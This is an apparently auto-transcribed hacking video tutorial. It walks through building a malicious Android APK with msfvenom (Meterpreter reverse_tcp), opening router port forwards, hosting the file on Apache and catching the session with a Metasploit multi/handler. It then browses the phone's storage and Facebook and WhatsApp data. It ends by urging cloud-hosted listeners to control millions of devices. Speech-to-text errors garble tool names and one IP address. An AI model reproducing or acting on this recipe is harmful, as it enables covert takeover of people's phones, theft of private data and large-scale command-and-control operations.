hi and welcome back to another episode of how to hack so today we'll discuss about hosting meter preview servers or listeners onto the internet and then hacking into a mobile device using a malicious apk file and from there you get a reverse connection outside through the firewall and from there on immediately you'll be able to actually gain complete control and access into the storage into the applications of the android device immediately so without further ado let's get started on today's tutorial so over here you can see on the background i have color linux running and on the foreground i have my own mobile device running which is not connected to the internal intranet or the wireless access point in my home network so what you can see here as i scroll down you can see that i have mobile data running so it means that i have my own independent ip address unique ip address that is then connected out into the internet so on the background we are going to focus on colonics and how we can actually be able to host the listener the attacking listener as well as the delivery mechanism through apache web server to actually host and deliver the apk file and then from there on be able to execute the file into the system install the application and then ultimately gain control of the entire mobile device so what we're going to do now is we are going to look at ifconfig and when we hit that we can see the internal ip address of the call linux machine so here we go 192 168.1.23 so the next thing we're going to do is we're going to open up firefox or any of the browser that you would like to use so we are going to go into the internet gateway which is 192.168.1.254. so again this is the internet service provider which is a router that is sent to your house and from there on you'll be able to actually utilize it so over here we can see that the ip address that i have is 202.202.166.63.69 so we're going to move into the firework configuration and over here we're going to go into the port forwarding so what we're going to do first is we can actually host our custom server which is the call linux machine and this timer i'm going to call it the meter reader so once i have it i'm going to do 192 168.1.23 and the port number we're going to put four four four four as well as four four four four so this would actually put in the external port start as well as the internal port start automatically for you and the next thing i want to do is i want to be able to host the mechanism of the apache web server so with this in mind we have to find out what is the port that we're using for apache so i can enter service followed by apache 2 followed by start so once we hit that we will start the service on kala linux and of course once you do that you can also look at the status of your apache web server and of course we can see that it is running so from here on we want to check out what is the ip address and what is the part that is being used on the call linux so we can enter 192 168.1.23 so of course we see that it's not using the d4 port 80 so it could be 8001 so let's go ahead and enter that so here we can see that we are hosting our apache web server on the port 8001 so we're going to go back into the router and we're going to hit 8001 on that likewise for the ending port so once we have that we can go ahead and click save or apply and once you have it running you can see the port forwarding list at the bottom of your access point so once that is done the first thing you want to do is you want to be able to create the malicious apk file so use msf venom dash p for the platform android meter reader followed by reverse underscore tcp and then you got your l host is 192 168.1.23 and in the yell port of 4444 followed by the r and then you output into slash root or you can output into your apache web server slash var slash www slash html slash so in this case this is normally what we do whenever we go through the tutorial but in this case it's going to be different so in this case we're going to call it android device.apk and we're going to go back into the l host so the l host is going it's not going to be 192.168.1 because this is for internal internet network only so we're going to remove this and we are going to change it to the ip address you saw earlier on your internet gateway so in this case the internet gateway ip address is 202.166.63.69 so this is your ip address that is facing out into the world so once we do that we will create the file and we are going to deliver this file through apache web server which is also hosted onto the internet now with the part forwarding enable so over here we are going to go into our android device over here we can actually look at the l host l part so we're gonna put an equal sign so that i missed out the equal sign so remember to put in the equal sign and then this would generate the apk file immediately so once we're done with that we got to create a listener a listener which is hosted onto the internet so the first thing we're going to do is we're going to enter msfconsole.queue so this will silently update or silently access into the msf console so once we gain access into metasploit we are going to use the multi handler so this will allow us to run the listener so we're going to go ahead and use exploit slash multi slash handler so once you do that you have to set the different kind of options so you gotta set the payload so you gotta set the payload as the one that you saw earlier android slash meterpreter slash reverse underscore tcp so once you do that you can enter show options so there are a couple of parameters that you have to enter so there's an l host and there is a l port so you set the l host as 192.168.1.23 so this is the ip address of your internal machine so once you do that you have your l port and your l host running and you can go ahead and exploit so this would start the tcp handler or the listener and now we're gonna put in the apk malicious apk file into the android device so over here we are going to open up the android device and we're gonna go ahead and enter the ip address of 202.166.63.69 followed by the port of 8001 followed by android device.apk so once you hit that it will say complete action using download so we can do that and this will download the file and we can open it up and then it would say that do you want to install this application you will have access to your call logs your pictures videos contacts and so on so a lot of times users actually go ahead and install all these applications so in one of the subsequent videos we will show how you can embed a malicious apk into an authentic application so once you're done with that you can go ahead and click open and when you click open we see that we actually have the media preview session being open up and likewise if you understand this everything is running through the internet so of course once you're here you can enter sysinfo you can enter help to see all the commands that you can that you can use and utilize as part of post exploitation so you can enter something like app underscore run or app underscore install and you can remove different kind of information so one very quick way of doing things that is that we can actually look at the webcam underscore list on the webcam chat or the screenshot and so on so we can enter sysinfo and this will tell us the information about the android device and we can also look at a couple of other things here it is really critical as part of post exploitation so we can actually enter pwd to see which directory we are at and we can cd into group directory so from here we can see a lot more information we can enter ls-l and we can see all the folders within the android device and of course we can go into cd sd card ls-l again this will show us all the information that are within the storage device so we can go into facebook browder we can go to tencent whatsapp and so on so a lot of other things that we can access into especially very sensitive data so for example if you go into com.facebook.katanar and then you enter lh-l so again you're going to see a lot more information so we can see it into facebook temporary so it's a temporary directory by facebook and then you can enter l so it will say send you some information about the file types and so on so likewise for all the other third-party applications that you install into the android device so there you see it how quickly we could actually set up a server and use port forwarding to actually route all those data coming into the internet gateway and into your intranet hacking server which is a listener running a meter reader so again from there on very quickly you can run all sorts of post modules command get the malicious apk out file out into the internet and then using that to actually do the delivery mechanism and then from there on getting complete access in the mobile device so it's the same concept it's the same idea particularly even on laptops on anything that's mobile not just mobile devices but you can start thinking about tablets thinking about laptops thinking about desktops thinking about wearables that have internet access and from there on you can do a lot of different capabilities by hosting your own hacking servers onto the internet or hacking listeners and if we think about the future of cyber security what we recognize is that there are a lot of opportunities for you to also think in terms of building containers which could just be hosting the listener and having those listeners modules being hosted across different cloud providers across the internet across the globe and from there on you can scale their operations very very quickly across the whole planet and then be able to manage tens hundreds of thousands of millions of devices and be able to manage your combining control servers in a highly scalable manner and from there on you can take control of all these devices and perform different kind of post exploitation so thank you so much once again for watching i hope you like what you've just watched so feel free to leave a comment below and i'll try my best to answer any of your questions and of course remember to like and subscribe to the channel so that you can become abreast of the latest cyber security tutorials and thank you so much for watching once again